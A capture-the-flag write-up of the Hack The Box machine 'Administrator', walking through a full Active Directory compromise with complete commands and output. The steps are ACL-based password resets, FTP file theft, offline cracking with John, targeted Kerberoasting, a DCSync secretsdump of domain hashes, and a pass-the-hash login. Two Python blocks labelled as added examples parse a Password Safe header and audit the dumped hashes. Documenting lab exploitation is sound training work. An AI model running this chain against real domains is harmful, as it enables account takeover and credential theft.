Administrator - Hack The Box

Sebin Thomas

Administrator is a Medium-rated Windows machine on Hack The Box that mimics a real-world Active Directory pentest. We start with valid credentials for Olivia, who has the rights to change Michael's password. After escalating to Benjamin and gaining FTP access, we retrieve a password-protected .psafe3 (Password Safe) database. Cracking its master password reveals Emily's credentials, and with BloodHound we identify a privilege escalation path to Ethan. We then run a targeted Kerberoasting attack, crack Ethan's hash, and gain further privileges. Finally, we abuse a DCSync misconfiguration to dump the Administrator hash.

Nmap scan

➜  Administrator nmap -v -sCV -Pn 10.10.11.42 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-18 04:53 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 04:53
Completed NSE at 04:53, 0.00s elapsed
Initiating NSE at 04:53
Completed NSE at 04:53, 0.00s elapsed
Initiating NSE at 04:53
Completed NSE at 04:53, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 04:53
Completed Parallel DNS resolution of 1 host. at 04:53, 0.10s elapsed
Initiating SYN Stealth Scan at 04:53
Scanning 10.10.11.42 [1000 ports]
Discovered open port 135/tcp on 10.10.11.42
Discovered open port 21/tcp on 10.10.11.42
Discovered open port 139/tcp on 10.10.11.42
Discovered open port 53/tcp on 10.10.11.42
Discovered open port 445/tcp on 10.10.11.42
Discovered open port 3269/tcp on 10.10.11.42
Discovered open port 464/tcp on 10.10.11.42
Discovered open port 389/tcp on 10.10.11.42
Discovered open port 5985/tcp on 10.10.11.42
Discovered open port 88/tcp on 10.10.11.42
Discovered open port 3268/tcp on 10.10.11.42
Discovered open port 636/tcp on 10.10.11.42
Discovered open port 593/tcp on 10.10.11.42
Completed SYN Stealth Scan at 04:53, 6.15s elapsed (1000 total ports)
Initiating Service scan at 04:53
Scanning 13 services on 10.10.11.42
Completed Service scan at 04:54, 62.13s elapsed (13 services on 1 host)
NSE: Script scanning 10.10.11.42.
Initiating NSE at 04:54
Completed NSE at 04:54, 13.03s elapsed
Initiating NSE at 04:54
Completed NSE at 04:55, 22.87s elapsed
Initiating NSE at 04:55
Completed NSE at 04:55, 0.00s elapsed
Nmap scan report for 10.10.11.42
Host is up (1.5s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-18 16:53:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-02-18T16:54:44
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m58s

NSE: Script Post-scanning.
Initiating NSE at 04:55
Completed NSE at 04:55, 0.00s elapsed
Initiating NSE at 04:55
Completed NSE at 04:55, 0.00s elapsed
Initiating NSE at 04:55
Completed NSE at 04:55, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.72 seconds
Raw packets sent: 1097 (48.268KB) | Rcvd: 1098 (43.976KB)
➜ Administrator

Olivia credential validation

➜  Administrator cme smb administrator.htb -u 'olivia' -p 'ichliebedich'
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\olivia:ichliebedich
➜ Administrator

Bloodhound

Next, we use BloodHound to enumerate potential privilege escalation paths for Olivia:

➜  Administrator bloodhound-python -ns 10.10.11.42 -d administrator.htb -u 'olivia' -p 'ichliebedich' --zip -c all --dns-tcp
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 01M 40S
INFO: Compressing output into 20250218120443_bloodhound.zip
➜ Administrator

Resetting Michael’s Password via Olivia’s GenericWrite

Checking BloodHound, we can see that Olivia has GenericAll permission on the Michael user, so we use bloodyAD to change Michael's password.

➜  Administrator bloodyAD --host '10.10.11.42' -d 'administrator.htb' -u 'olivia' -p 'ichliebedich' set password 'MICHAEL' 'ichliebedich'
[+] Password changed successfully!

Validating Credentials for Michael

➜  Administrator cme smb administrator.htb -u 'michael' -p 'ichliebedich'
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\michael:ichliebedich
➜ Administrator

Resetting Benjamin’s Password via ForceChangePassword

Checking BloodHound again, we can see that Michael has ForceChangePassword permission on the Benjamin user, so we use bloodyAD again to change Benjamin's password.

➜  Administrator bloodyAD --host '10.10.11.42' -d 'administrator.htb' -u 'michael' -p 'ichliebedich' set password 'benjamin' 'ichliebedich'
[+] Password changed successfully!

Validating Credentials for Benjamin

➜  Administrator nxc smb administrator.htb -u 'benjamin' -p 'ichliebedich'                                                       
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\benjamin:ichliebedich
➜ Administrator

FTP

After changing Benjamin's password, BloodHound shows no further useful permissions for him, so I checked for FTP access, since port 21 is open.

➜  Administrator cme ftp administrator.htb -u 'benjamin' -p 'ichliebedich' 
FTP administrator.htb 21 administrator.htb [*] Banner: Microsoft FTP Service
FTP administrator.htb 21 administrator.htb [+] benjamin:ichliebedich

After successful authentication I logged in and retrieved a .psafe3 file from FTP.

➜  Administrator ftp 10.10.11.42                                                                                                           
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:kali): benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||57121|)
125 Data connection already open; Transfer starting.
10-05-24 08:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||57124|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************************************************************************************| 952 1.14 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:01 (0.79 KiB/s)
ftp> exit
221 Goodbye.
➜ Administrator

Cracking Password Safe (.psafe3) with John the Ripper

Since the .psafe3 file is password protected, I used pwsafe2john to extract a hash of its master password and cracked it with John the Ripper.

➜  Administrator pwsafe2john Backup.psafe3 > psafe-hash
➜ Administrator john psafe-hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho (Backu)
1g 0:00:00:00 DONE (2025-02-18 12:16) 2.777g/s 17066p/s 17066c/s 17066C/s newzealand..iheartyou
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
➜ Administrator

With that password I opened the file in Password Safe (pwsafe) and recovered the stored usernames and passwords.
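To show what pwsafe2john actually extracts from a Password Safe v3 file, and why the iteration count John reported (2048) sets the cost of every guess, here is an added example (not code from the original post) that parses the fixed v3 header and performs the same master-password check the application does on open. The sample database, salt and passphrase are constructed for the demonstration.

```python
import hashlib
import hmac
import struct

PWS3_TAG = b"PWS3"
# Fixed-layout v3 header: TAG(4) | SALT(32) | ITER(4, little-endian) | H(P')(32),
# followed by B1..B4 (4 x 16 bytes) and the IV (16 bytes), which the parser below skips.
HEADER_LEN = 4 + 32 + 4 + 32 + 4 * 16 + 16


def stretch_key(passphrase: bytes, salt: bytes, iterations: int) -> bytes:
    """Password Safe v3 key stretching: X0 = SHA256(P|SALT), Xi = SHA256(Xi-1), P' = X_ITER.
    Every candidate master password costs ITER+1 SHA-256 calls; that is the
    'iteration count' cost John printed when it loaded the pwsafe2john hash."""
    x = hashlib.sha256(passphrase + salt).digest()
    for _ in range(iterations):
        x = hashlib.sha256(x).digest()
    return x


def build_psafe3_header(passphrase: bytes, salt: bytes, iterations: int) -> bytes:
    """Constructed fixture: a v3 header for a known passphrase (B1..B4 and IV zero-filled)."""
    hp = hashlib.sha256(stretch_key(passphrase, salt, iterations)).digest()
    return PWS3_TAG + salt + struct.pack("<I", iterations) + hp + bytes(4 * 16 + 16)


def parse_psafe3_header(data: bytes) -> dict:
    """Return the fields pwsafe2john extracts: salt, iteration count and H(P')."""
    if len(data) < HEADER_LEN or data[:4] != PWS3_TAG:
        raise ValueError("not a Password Safe v3 database")
    return {
        "salt": data[4:36],
        "iterations": struct.unpack("<I", data[36:40])[0],
        "hp": data[40:72],
    }


def verify_master_password(data: bytes, candidate: bytes) -> bool:
    """The check Password Safe performs on open: SHA256(P') must equal the stored H(P')."""
    h = parse_psafe3_header(data)
    got = hashlib.sha256(stretch_key(candidate, h["salt"], h["iterations"])).digest()
    return hmac.compare_digest(got, h["hp"])


# Constructed sample: a fixed salt and the 2048-iteration cost seen in the John output above.
SAMPLE_SALT = bytes(range(32))
SAMPLE_DB = build_psafe3_header(b"demo-master-pass", SAMPLE_SALT, 2048)
```

Raising the iteration count when saving the safe is the only knob the owner has against offline guessing once the file leaks, since the salt and H(P') are stored in cleartext in the header.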

Validating Emily’s Credentials from Psafe for SMB

I validated each stored user and password with CrackMapExec, and Emily was the one with a valid domain password.

➜  Administrator crackmapexec smb administrator.htb -u emma -p WwANQWnmJnGV07WQN8bMS7FMAbjNur
SMB administrator.htb 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB administrator.htb 445 DC [-] administrator.htb\emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
➜ Administrator crackmapexec smb administrator.htb -u alexander -p UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
SMB administrator.htb 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB administrator.htb 445 DC [-] administrator.htb\alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
➜ Administrator crackmapexec smb administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
SMB administrator.htb 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB administrator.htb 445 DC [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
➜ Administrator

Kerberoasting with GenericWrite: Cracking Ethan’s Account

Checking BloodHound again, Emily has GenericWrite permission on the Ethan user, so I used targetedKerberoast.py to temporarily add an SPN to Ethan and request a Kerberoastable ticket for him.

➜  Administrator targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$2c651041216ff1c252c13972700a9092$[hash truncated]
[VERBOSE] SPN removed successfully for (ethan)
➜ Administrator

John the Ripper for Kerberos Hash Cracking

Ethan's TGS hash cracked against rockyou.txt, giving us his password.

➜  Administrator john kerb-hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
limpbizkit (?)
1g 0:00:00:00 DONE (2025-02-18 12:26) 20.00g/s 102400p/s 102400c/s 102400C/s newzealand..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
➜ Administrator

Credential validation for Ethan

➜  Administrator crackmapexec smb administrator.htb -u 'ethan' -p 'limpbizkit'  
SMB administrator.htb 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB administrator.htb 445 DC [+] administrator.htb\ethan:limpbizkit

DCSync

Checking BloodHound once more, Ethan has DCSync rights on the domain, so I used secretsdump.py to replicate every account's hashes from the domain controller.

➜  Administrator secretsdump.py 'administrator.htb'/'ethan':'limpbizkit'@administrator.htb
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:409e1ae3a9e1d8531a7d9d2d83d0aa02f0d6c5a5435c621e3304b294fe32d4e9
administrator.htb\michael:aes128-cts-hmac-sha1-96:97cbb32467f5971a85b6beb994d12fdb
administrator.htb\michael:des-cbc-md5:e6851cb51f078ae3
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:85c174190270b6f36bd1318ea26a22c603901a57c78f3316c96f2a334b28107f
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:df0b408d253e548c4ec180a082e3a593
administrator.htb\benjamin:des-cbc-md5:f7013ec492139dc4
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
➜ Administrator
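Olivia, Michael and Benjamin share one NT hash in the dump above because they were all reset to the same password. As an added example (not from the original post), here is a small audit of a secretsdump NTDS listing that a defender can run on this same format to flag password reuse, empty passwords and LM hash storage; the sample input is a constructed subset of the records shown above.

```python
import re
from collections import defaultdict

# Well-known sentinel hashes in secretsdump output
BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM slot when LM hash storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# secretsdump NTDS record: [domain\]account:rid:lmhash:nthash:::
RECORD_RE = re.compile(
    r"^(?P<acct>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

# Constructed sample: a subset of the secretsdump records shown above, plus tool chatter
SAMPLE_DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
[*] Kerberos keys grabbed
"""


def parse_ntds_records(text: str) -> list:
    """Keep only well-formed hash records; status lines and Kerberos key lines are skipped."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def audit_ntds(records: list) -> dict:
    """Flag password reuse (one NT hash on several accounts), empty passwords and LM hashes."""
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["acct"])
    return {
        "shared_nt": {h: sorted(a) for h, a in by_nt.items() if len(a) > 1 and h != EMPTY_NT},
        "empty_password": sorted(by_nt.get(EMPTY_NT, [])),
        "lm_stored": sorted(r["acct"] for r in records if r["lm"] != BLANK_LM),
    }


def audit_sample() -> dict:
    return audit_ntds(parse_ntds_records(SAMPLE_DUMP))
```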

Administrator

➜  Administrator crackmapexec winrm administrator.htb -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
SMB administrator.htb 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
HTTP administrator.htb 5985 DC [*] http://administrator.htb:5985/wsman
WINRM administrator.htb 5985 DC [+] administrator.htb\Administrator:3dc553ce4b9fd20bd016e098d2d2fd2e (Pwn3d!)
➜ Administrator
  • Title: Administrator - Hack The Box
  • Author: Sebin Thomas
  • Created at : 2025-02-01 15:05:00
  • Updated at : 2025-08-07 14:50:55
  • Link: https://0xsebin-blogs.vercel.app/2025/02/01/Administrator-HTB/
  • License: All Rights Reserved © Sebin Thomas